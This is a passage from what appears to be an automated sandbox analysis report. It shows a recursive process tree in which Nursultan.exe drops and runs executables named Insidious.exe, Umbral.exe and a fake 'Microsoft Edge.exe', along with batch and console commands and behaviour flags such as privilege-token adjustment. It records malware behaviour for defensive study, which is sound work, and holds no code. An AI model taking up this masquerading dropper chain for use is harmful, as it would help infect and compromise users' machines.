        
        timeout 4 /nobreak
        6⤵
        Delays execution with timeout.exe
        
        PID:1500
      - C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        6⤵
        
        PID:2672
    - - C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1112
    - - C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2644
    - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        5⤵
        Executes dropped EXE
        
        PID:324
  - - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2724
    - - C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        5⤵
        Executes dropped EXE
        
        PID:2216
      - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        6⤵
        
        PID:1620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        7⤵
        
        PID:1584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        8⤵
        
        PID:2396
        
        C:\Windows\system32\cmd.exe
        
        cmd
        8⤵
        
        PID:356
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2528
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        7⤵
        Delays execution with timeout.exe
        
        PID:2688
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        7⤵
        
        PID:2104
      - C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2280
      - C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1844
      - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        6⤵
        Executes dropped EXE
        
        PID:1324
    - - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        5⤵
        Executes dropped EXE
        
        PID:872
      - C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        6⤵
        Executes dropped EXE
        
        PID:1608
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        7⤵
        
        PID:2460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        8⤵
        
        PID:2352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        9⤵
        
        PID:2428
        
        C:\Windows\system32\cmd.exe
        
        cmd
        9⤵
        
        PID:2984
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2648
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2816
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        8⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:992
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        7⤵
        Executes dropped EXE
        
        PID:1136
      - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        6⤵
        Executes dropped EXE
        
        PID:2440
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        7⤵
        Executes dropped EXE
        
        PID:2120
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        8⤵
        
        PID:760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        9⤵
        
        PID:2556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        10⤵
        
        PID:2268
        
        C:\Windows\system32\cmd.exe
        
        cmd
        10⤵
        
        PID:2580
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:3048
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:1724
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        9⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:696
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        8⤵
        Executes dropped EXE
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        7⤵
        Executes dropped EXE
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        8⤵
        Executes dropped EXE
        
        PID:1580
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        9⤵
        
        PID:1784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        10⤵
        
        PID:1792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        11⤵
        
        PID:948
        
        C:\Windows\system32\cmd.exe
        
        cmd
        11⤵
        
        PID:1552
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:1524
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:1060
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        10⤵
        
        PID:1960
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        9⤵
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:712
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        9⤵
        Executes dropped EXE
        
        PID:984
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        8⤵
        Executes dropped EXE
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        9⤵
        Executes dropped EXE
        
        PID:612
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        10⤵
        
        PID:3052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        11⤵
        
        PID:992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        12⤵
        
        PID:1684
        
        C:\Windows\system32\cmd.exe
        
        cmd
        12⤵
        
        PID:1740
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:2844
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        11⤵
        Delays execution with timeout.exe
        
        PID:1636
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        11⤵
        
        PID:2876
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        10⤵
        Executes dropped EXE
        
        PID:576
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        10⤵
        Executes dropped EXE
        
        PID:1864
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        9⤵
        Executes dropped EXE
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        10⤵
        Executes dropped EXE
        
        PID:2880
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        11⤵
        
        PID:2016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        12⤵
        
        PID:3020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        13⤵
        
        PID:2056
        
        C:\Windows\system32\cmd.exe
        
        cmd
        13⤵
        
        PID:1652
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:1304
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        12⤵
        Delays execution with timeout.exe
        
        PID:324
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        12⤵
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        11⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        11⤵
        Executes dropped EXE
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        11⤵
        Executes dropped EXE
        
        PID:1144
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        10⤵
        Executes dropped EXE
        
        PID:1812
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        11⤵
        Executes dropped EXE
        
        PID:3068
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        12⤵
        
        PID:2916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        13⤵
        
        PID:2028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        14⤵
        
        PID:3004
        
        C:\Windows\system32\cmd.exe
        
        cmd
        14⤵
        
        PID:2796
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:992
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        13⤵
        Delays execution with timeout.exe
        
        PID:2676
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        13⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        12⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        12⤵
        Executes dropped EXE
        
        PID:872
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        12⤵
        Executes dropped EXE
        
        PID:2156
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        11⤵
        Executes dropped EXE
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        12⤵
        Executes dropped EXE
        
        PID:2836
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        13⤵
        
        PID:2688
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        14⤵
        
        PID:1332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        15⤵
        
        PID:2996
        
        C:\Windows\system32\cmd.exe
        
        cmd
        15⤵
        
        PID:1144
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:1540
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        14⤵
        Delays execution with timeout.exe
        
        PID:2344
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        14⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        13⤵
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1052
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        13⤵
        Executes dropped EXE
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        13⤵
        Executes dropped EXE
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        12⤵
        Executes dropped EXE
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        13⤵
        Executes dropped EXE
        
        PID:2356
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        14⤵
        
        PID:3048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        15⤵
        
        PID:1836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        16⤵
        
        PID:2076
        
        C:\Windows\system32\cmd.exe
        
        cmd
        16⤵
        
        PID:1680
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:1088
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        15⤵
        Delays execution with timeout.exe
        
        PID:2808
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        15⤵
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        14⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        14⤵
        Executes dropped EXE
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        14⤵
        Executes dropped EXE
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        13⤵
        Executes dropped EXE
        
        PID:1348
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        14⤵
        Executes dropped EXE
        
        PID:2136
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        15⤵
        
        PID:2980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        16⤵
        
        PID:2832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        17⤵
        
        PID:2992
        
        C:\Windows\system32\cmd.exe
        
        cmd
        17⤵
        
        PID:2892
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:2976
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        16⤵
        Delays execution with timeout.exe
        
        PID:2196
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        16⤵
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        15⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        15⤵
        Executes dropped EXE
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        15⤵
        Executes dropped EXE
        
        PID:992
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        14⤵
        Executes dropped EXE
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        15⤵
        Executes dropped EXE
        
        PID:2624
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        16⤵
        
        PID:1272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        17⤵
        
        PID:2572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        18⤵
        
        PID:1772
        
        C:\Windows\system32\cmd.exe
        
        cmd
        18⤵
        
        PID:1628
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:2340
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        17⤵
        Delays execution with timeout.exe
        
        PID:1652
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        17⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        16⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        16⤵
        
        PID:1508
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        16⤵
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        15⤵
        Executes dropped EXE
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        16⤵
        
        PID:1688
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        17⤵
        
        PID:2156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        18⤵
        
        PID:2176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        19⤵
        
        PID:816
        
        C:\Windows\system32\cmd.exe
        
        cmd
        19⤵
        
        PID:712
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:764
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        18⤵
        Delays execution with timeout.exe
        
        PID:892
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        18⤵
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        17⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        17⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        17⤵
        
        PID:1520
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        16⤵
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        17⤵
        
        PID:2964
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        18⤵
        
        PID:1864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        19⤵
        
        PID:2440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        20⤵
        
        PID:2404
        
        C:\Windows\system32\cmd.exe
        
        cmd
        20⤵
        
        PID:2396
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:2624
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        19⤵
        Delays execution with timeout.exe
        
        PID:2952
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        19⤵
        
        PID:1600
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        18⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        18⤵
        
        PID:376
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        18⤵
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        17⤵
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        18⤵
        
        PID:2468
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        19⤵
        
        PID:2508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        20⤵
        
        PID:1720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        21⤵
        
        PID:2392
        
        C:\Windows\system32\cmd.exe
        
        cmd
        21⤵
        
        PID:1868
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:2908
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        20⤵
        Delays execution with timeout.exe
        
        PID:2876
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        20⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        19⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        19⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        19⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        18⤵
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        19⤵
        
        PID:1792
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        20⤵
        
        PID:2568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        21⤵
        
        PID:1808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        22⤵
        
        PID:2684
        
        C:\Windows\system32\cmd.exe
        
        cmd
        22⤵
        
        PID:1332
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:1508
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        21⤵
        Delays execution with timeout.exe
        
        PID:2828
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        21⤵
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        20⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1304
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        20⤵
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        20⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        19⤵
        
        PID:1256
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        20⤵
        
        PID:408
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        21⤵
        
        PID:864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        22⤵
        
        PID:2232
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        23⤵
        
        PID:2988
        
        C:\Windows\system32\cmd.exe
        
        cmd
        23⤵
        
        PID:344
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:2796
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        22⤵
        Delays execution with timeout.exe
        
        PID:872
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        22⤵
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        21⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        21⤵
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        21⤵
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
